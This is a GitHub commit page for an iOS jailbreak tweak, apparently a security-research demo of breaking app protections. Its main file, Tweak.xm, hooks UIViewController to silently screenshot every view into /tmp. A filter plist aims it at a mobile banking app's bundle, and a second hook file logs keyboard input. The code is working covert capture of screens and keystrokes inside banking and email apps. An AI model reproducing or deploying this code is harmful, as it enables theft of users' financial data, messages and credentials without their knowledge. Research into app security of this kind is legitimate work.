Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Browse files

demo to show hooking of UI classes in iOS and sceencapture each indiv…

…idual view of the iPhone enterprise app. The user could be viewing emails via the iPhone app that is encrypted and secure http://milo2012.wordpress.com/2011/10/17/breaking-enterprise-iphone-application-security/
  • Loading branch information...
commit ccd4de7a8f7d5c52cbd713b6404b5925ba6a2d5a 1 parent afbf11f
@milo2012 authored
View
0  demoScreenCapture1/.theos/fakeroot
No changes.
View
1  demoScreenCapture1/.theos/packages/com.yourcompany.demoscreencapture1-0.0.1
@@ -0,0 +1 @@
+0.0.1-1
View
9 demoScreenCapture1/Makefile
@@ -0,0 +1,9 @@
+SYSROOT=/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS3.0.sdk
+
+include theos/makefiles/common.mk
+
+TWEAK_NAME = demoScreenCapture1
+demoScreenCapture1_FILES = Tweak.xm
+demoScreenCapture1_FRAMEWORKS = UIKit QuartzCore CoreGraphics IOKit AVFoundation
+demoScreenCapture1_PRIVATEFRAMEWORKS = UIKit QuartzCore CoreGraphics IOKit AVFoundation GraphicsServices
+include $(THEOS_MAKE_PATH)/tweak.mk
View
158 demoScreenCapture1/Tweak.xm
@@ -0,0 +1,158 @@
+#import <UIKit/UIKit.h>
+#import <GraphicsServices/GSEvent.h>
+#import <CommonCrypto/CommonDigest.h>
+
+UIKIT_EXTERN CGImageRef UIGetScreenImage();
+//NSNumber *count = [NSNumber numberWithInt:0];
+int value;
+int initialLaunch=1;
+
+
+void screenCapture(){
+ if(initialLaunch==0){
+ NSLog(@"isViewLoaded 2nd launch");
+ NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
+
+ NSMutableArray *pngList2 = [[NSMutableArray alloc] init];
+ NSMutableArray *sortedArray = [[NSMutableArray alloc] init];
+
+ NSArray *dirContents = [[NSFileManager defaultManager] directoryContentsAtPath:@"/tmp/"];
+ for (NSString *tString1 in dirContents) {
+ if ([tString1 hasSuffix:@".png"]) {
+ tString1 = [tString1 stringByReplacingOccurrencesOfString:@"test" withString:@""];
+ tString1 = [tString1 stringByReplacingOccurrencesOfString:@".png" withString:@""];
+ [pngList2 addObject:tString1];
+ }
+ }
+ [pngList2 sortUsingDescriptors: [NSArray arrayWithObject:[[[NSSortDescriptor alloc] initWithKey:@"doubleValue" ascending:YES] autorelease]]];
+
+ sortedArray = [pngList2 copy];
+
+ NSString *lastObjectStr = [sortedArray lastObject];
+ NSLog(@"lastObjectStr: %@",lastObjectStr);
+
+ for(NSString *str1 in sortedArray){
+ NSLog(@"List of screenshots : test%@.png",str1);
+ }
+
+ NSNumber *newCounter = [NSNumber numberWithInteger:[lastObjectStr integerValue]];
+ value = [newCounter intValue];
+ newCounter = [NSNumber numberWithInt:value +1];
+ NSLog(@"Next filename: test%@.png",[newCounter stringValue]);
+
+ NSString *jpgPath = [NSString stringWithFormat:@"/tmp/test%@.png",[newCounter stringValue]];
+ CGImageRef cgScreen = UIGetScreenImage();
+ UIImage *screenshot = [UIImage imageWithCGImage:cgScreen];
+ CGImageRelease(cgScreen);
+ NSData *imageData = [NSData dataWithData:UIImagePNGRepresentation(screenshot)];
+ [imageData writeToFile:jpgPath atomically:YES];
+
+ [pngList2 release];
+ [sortedArray release];
+ [pool release];
+ }
+}
+
+//%hook UINavigationController
+//-(void)viewDidAppear:(BOOL)view{
+// screenCapture();
+// %orig;
+//}
+//%end
+
+//%hook UITableViewController
+//-(void)viewDidAppear:(BOOL)view{
+// screenCapture();
+// %orig;
+//}
+//%end
+
+//%hook UITabBarController
+//-(void)viewDidAppear:(BOOL)view{
+// screenCapture();
+// %orig;
+//}
+//%end
+
+//%hook UITableViewController
+//-(void)viewDidLoad{
+// screenCapture();
+// %orig;
+//}
+//%end
+
+%hook UIViewController
+-(void)viewDidLoad{
+ initialLaunch=0;
+ %orig;
+}
+-(BOOL)isViewLoaded{
+ screenCapture();
+ return %orig;
+}
+
+-(void)applicationWillSuspend{
+ NSLog(@"appWillSuspend");
+ NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
+ NSMutableArray *pngList3 = [[NSMutableArray alloc] init];
+
+ NSData *dataBuffer = [[NSData alloc] init];
+
+ NSArray *dirContents = [[NSFileManager defaultManager] directoryContentsAtPath:@"/tmp/"];
+ for (NSString *tString in dirContents) {
+ if ([tString hasSuffix:@".png"]) {
+ [pngList3 addObject:tString];
+ }
+ }
+ NSFileManager *fileMgr = [[NSFileManager alloc] init];
+ NSMutableArray *newPngListMD5 = [[NSMutableArray alloc] init];
+ NSMutableArray *newPngListFile = [[NSMutableArray alloc] init];
+
+ //MD5 the files and add to Array for comparison later
+ for(NSString *anID in pngList3){
+ dataBuffer = [fileMgr contentsAtPath: [NSString stringWithFormat:@"/tmp/%@",anID]];
+ unsigned char result[16];
+ CC_MD5(dataBuffer.bytes, dataBuffer.length, result);
+ NSString *md5String = [NSString stringWithFormat:
+ @"%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x",
+ result[0], result[1], result[2], result[3],
+ result[4], result[5], result[6], result[7],
+ result[8], result[9], result[10], result[11],
+ result[12], result[13], result[14], result[15]
+ ];
+ [newPngListMD5 addObject:md5String];
+ [newPngListFile addObject:anID];
+ }
+ //Remove Duplicated Images
+ NSArray *copy = [newPngListMD5 copy];
+ NSInteger index = [copy count] - 1;
+ for (id object in [copy reverseObjectEnumerator]) {
+ if ([newPngListMD5 indexOfObject:object inRange:NSMakeRange(0, index)] != NSNotFound) {
+ [fileMgr removeItemAtPath: [NSString stringWithFormat:@"/tmp/%@",[newPngListFile objectAtIndex:index]] error: NULL];
+ NSLog(@"Deleted file: %@", [newPngListFile objectAtIndex:index]);
+ [newPngListFile removeObjectAtIndex:index];
+ [newPngListMD5 removeObjectAtIndex:index];
+ }
+ index--;
+ }
+
+ [newPngListMD5 release];
+ [fileMgr release];
+ [newPngListFile release];
+ [pool release];
+ %orig;
+}
+
+%end
+
+
+//%hook UIView
+//-(BOOL)isEnabled{
+// NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
+// NSLog(@"view isEnabled");
+// [pool release];
+// return %orig;
+//}
+//%end
+
+
View
10 demoScreenCapture1/_/DEBIAN/control
@@ -0,0 +1,10 @@
+Package: com.yourcompany.demoscreencapture1
+Name: demoScreenCapture1
+Depends: mobilesubstrate
+Version: 0.0.1-1
+Architecture: iphoneos-arm
+Description: An awesome MobileSubstrate tweak!
+Maintainer: System Administrator
+Author: System Administrator
+Section: Tweaks
+Installed-Size: 20
View
BIN  demoScreenCapture1/_/Library/MobileSubstrate/DynamicLibraries/demoScreenCapture1.dylib
Binary file not shown
View
1  demoScreenCapture1/_/Library/MobileSubstrate/DynamicLibraries/demoScreenCapture1.plist
@@ -0,0 +1 @@
+{ Filter = { Bundles = ( "com.intuit.mobilebanking01049" ); }; }
View
BIN  demoScreenCapture1/com.yourcompany.demoscreencapture1_0.0.1-1_iphoneos-arm.deb
Binary file not shown
View
9 demoScreenCapture1/control
@@ -0,0 +1,9 @@
+Package: com.yourcompany.demoscreencapture1
+Name: demoScreenCapture1
+Depends: mobilesubstrate
+Version: 0.0.1
+Architecture: iphoneos-arm
+Description: An awesome MobileSubstrate tweak!
+Maintainer: System Administrator
+Author: System Administrator
+Section: Tweaks
View
1  demoScreenCapture1/demoScreenCapture1.plist
@@ -0,0 +1 @@
+{ Filter = { Bundles = ( "com.intuit.mobilebanking01049" ); }; }
View
0  demoScreenCapture1/obj/.stamp
No changes.
View
BIN  demoScreenCapture1/obj/Tweak.xm.o
Binary file not shown
View
BIN  demoScreenCapture1/obj/demoScreenCapture1.dylib
Binary file not shown
View
1  demoScreenCapture1/theos
View
7 kbhook2/Tweak.xm
@@ -5,10 +5,15 @@
//[fileManager removeItemAtPath:filePath error:NULL];
%hook UIKeyboardImpl
-
NSMutableString *keyboardInput = [[NSMutableString alloc] init];
NSString *str = [[NSString alloc] init];
+
+-(void)removeFromSuperview{
+ NSLog(@"removeFromSuperView");
+ %orig;
+}
+
-(BOOL)returnKeyEnabled{
if([keyboardInput length]!=0){
NSString *myBundleName = [[NSString alloc] init];
Please sign in to comment.
Something went wrong with that request. Please try again.